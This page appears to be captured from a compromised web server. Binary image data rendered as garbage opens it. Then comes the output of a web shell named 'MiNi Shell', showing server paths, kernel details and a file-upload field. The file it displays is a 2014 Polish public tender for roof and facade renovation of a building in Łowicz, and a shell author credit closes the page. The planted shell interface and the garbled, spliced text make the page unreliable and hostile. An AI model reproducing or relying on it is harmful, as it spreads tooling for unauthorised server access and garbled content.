JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/256290-N-2014.html

<p class="kh_header"><b>Łowicz: Wymiana pokrycia dachowego z papy na blachodachówkę, remont stropu i kominów, wymiana rynien i rur spustowych wraz z remontem elewacji ze sztukaterią na kamienicy wielorodzinnej przy ul. Długa 22 w Łowiczu</b><br>
<b>Numer ogłoszenia: 256290 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej w Łowiczu , ul. Nowa 5, 99-400 Łowicz, woj. łódzkie, tel. 46 8376063; 8376098, faks 46 8376063.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana pokrycia dachowego z papy na blachodachówkę, remont stropu i kominów, wymiana rynien i rur spustowych wraz z remontem elewacji ze sztukaterią na kamienicy wielorodzinnej przy ul. Długa 22 w Łowiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na: Wymianie pokrycia dachowego z papy na blachodachówkę, remont stropu i kominów, wymiana rynien i rur spustowych wraz z remontem elewacji ze sztukaterią na kamienicy wielorodzinnej przy ul. Długiej 22     w  zakresie:
- remont cokołu,
- remont elewacji ze sztukaterią,
- remont pozostałej elewacji,
- remont tynków wewnątrz bramy,
- remont i ocieplenie stropu,
- wymiana pokrycia dachu na blachodachówkę,   
- wymiana rynien i rur spustowych ,
- remont kominów,
- wykonania obróbek blacharskich.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.45.00.00-6, 45.44.21.10-1, 45.26.26.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający działając na podstawie art. 45 ust. 2 ustawy, wymaga wniesienia wadium.
1. Wykonawcy zobowiązani są wnieść przed terminem składania ofert wadium w wysokości 3 000,00 PLN (trzy tysiące PLN) w wybranej postaci określonej w art. 45 ust. 6 Ustawy.
2. Wadium wnosi się przed upływem terminu składania ofert. Wadium wnoszone 
w pieniądzu wpłaca się przelewem na rachunek bankowy:
Zakładu Gospodarki Mieszkaniowej w Łowiczu
Bank Gospodarki Żywnościowej S.A. w Łowiczu, ul. Starościńska 1
NRB: 41 2030 0045 1110 0000 0236 8980
z dopiskiem: Remont dachu oraz elewacji kamienicy ul. Długa 22 w Łowiczu. Zwrot wadium nastąpi przelewem zgodnie z art. 46. ust 1 Ustawy.
3. Do oferty należy dołączyć potwierdzoną za zgodność z oryginałem kopię dowodu wniesienia wadium.
4. W przypadku wniesienia wadium w innej formie niż w pieniądzu dowód wniesienia wadium musi być złożony wraz z ofertą w oddzielnej kopercie z informacją dotyczącą sposobu jego zwrotu, natomiast potwierdzona za zgodność z oryginałem kopia musi być załączona (wpięta) do oferty.
5. Za chwilę faktycznego przekazania wadium w przypadku wnoszenia wadium w postaci pieniężnej uznaje się chwilę uznania konta Zamawiającego, a nie zaś chwilę obciążenia rachunku Wykonawcy.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1 lub pełnomocnictw.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania niezbędnej wiedzy i doświadczenia, tzn. Zamawiający uzna, że Wykonawca spełni warunek, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 robotę (słownie: jedną) odpowiadającą swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 150 000,00 PLN brutto (tj. obejmującej cały zakres zamówienia) lub wykaże się 1 robotą (słownie: jedną) o wartości nie mniejszej niż 100 000,00 PLN na wymianę pokrycia dachowego na blachodachówkę i 1  robotą  (słownie: jedną) o wartości nie mniejszej niż 100 000,00 PLN na remont elewacji oraz przedstawi dokumenty (referencje, bezusterkowe protokoły odbioru robót itp.) potwierdzające, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tzn.: dysponują 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz uprawnienia do kierowania pracami konserwatorskimi, która należy do właściwej Okręgowej Izby Inżynierów Budownictwa. Wykaże, iż kierownik robót w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres posiadania uprawnień  jest krótszy - w tym okresie nadzorował co najmniej 1 robotą   (słownie: jedną) odpowiadającą swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 150 000,00 PLN brutto lub 2 roboty (słownie: dwie) odpowiadające swoim rodzajem i wartością robotom stanowiących przedmiot zamówienia o wartości nie mniejszej niż 100 000,00 PLN oraz przedstawi dokumenty (referencje, bezusterkowe protokoły odbioru robót itp.) potwierdzające, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tzn.: dysponują 1 osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz uprawnienia do kierowania pracami konserwatorskimi, która należy do właściwej Okręgowej Izby Inżynierów Budownictwa. Wykaże, iż kierownik robót w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres posiadania uprawnień  jest krótszy - w tym okresie nadzorował co najmniej 1 robotą   (słownie: jedną) odpowiadającą swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 150 000,00 PLN brutto lub 2 roboty (słownie: dwie) odpowiadające swoim rodzajem i wartością robotom stanowiących przedmiot zamówienia o wartości nie mniejszej niż 100 000,00 PLN oraz przedstawi dokumenty (referencje, bezusterkowe protokoły odbioru robót itp.) potwierdzające, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej, tzn. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000 PLN. Wykażą, że posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 120 000,00 PLN (słownie: sto dwadzieścia tysięcy PLN) na podstawie informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której Wykonawca posiada rachunek, potwierdzającej wysokość środków  finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu zgodnie z art. 44 Ustawy w związku z art. 22 ust. 1 Ustawy o treści zgodnej z załącznikiem nr 2 do SIWZ
- wykaz nadzorowanych robót budowanych przez kierownika robót w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, tzn. jeżeli w okresie ostatnich  5 lat przed upływem terminu składania ofert, a jeżeli okres posiadania uprawnień jest krótszy - w tym okresie, nadzorował co najmniej 1 robotą (słownie: jedną) odpowiadającą swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 150 000,00 PLN brutto każda lub 2 (słownie: dwie) roboty odpowiadające swoim rodzajem i wartością robotom stanowiących przedmiot zamówienia o wartości nie mniejszej niż 100 000,00 PLN z podaniem ich rodzaju, wartości, daty i miejsca wykonywania o treści zgodnej z załącznikiem nr 3a do SIWZ oraz załączenia dokumentów (referencji lub bezusterkowych protokołów odbioru robót itp.) potwierdzających, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
- kopii stosownych dokumentów (oryginał do wglądu) potwierdzających uprawnienia budowlane osób ze strony Wykonawcy, którzy będą kierować robotami budowlanymi i pracami konserwatorskimi - w zakresie zamówienia (art. 22 ust. 1 pkt. 1): kierownik budowy w specjalności konstrukcyjno-budowlanej oraz kopia rekomendacji konserwatorskich lub zezwolenie na kierowanie robotami przy obiektach zabytkowych,
- kopia zaświadczenia stwierdzającego przynależność osoby, która kierować będzie przedmiotowymi robotami budowlanymi do właściwej dla niego Okręgowej Izby Inżynierów Budownictwa (oryginał do wglądu),
- oświadczenie, iż Wykonawca ubezpieczy w/w roboty budowlane objęte przedmiotem zamówienia od następujących sytuacji: nagłe, nieprzewidziane i niezależne od woli Ubezpieczającego zdarzenia (zaistniałe w miejscu i okresie ubezpieczenia wskazanym w polisie), powodujące zniszczenie, uszkodzenie lub utratę przedmiotu ubezpieczenia i przedłoży Zamawiającemu powyższe ubezpieczenie w dniu podpisania umowy. Wysokość ubezpieczenia musi być nie niższa niż kwota oferowana za wykonanie w/w zamówienia,
- w przypadku Wykonawców wspólnie ubiegających się o zamówienie (np. spółka cywilna, konsorcjum) należy złożyć dodatkowo: 
a) wykaz wspólników lub konsorcjantów ubiegających się o udzielenie zamówienia,
b) pełnomocnictwo udzielone jednemu ze wspólników, konsorcjantów lub innej osobie do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarciu umowy w sprawie zamówienia publicznego,
- wypełniony i podpisany kosztorys ofertowy szczegółowy wykonany na podstawie dostarczonego przez Zamawiającego przedmiaru robót,
- kopię dowodu wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.9</li>
<li>2 - Okres gwarancji - 0.1</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zgm.bip.lowicz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej w Łowiczu; ul. Nowa 5; 99-400 Łowicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 10:00, miejsce: Zakład Gospodarki Mieszkaniowej w Łowiczu; ul. Nowa 5; 99-400 Łowicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com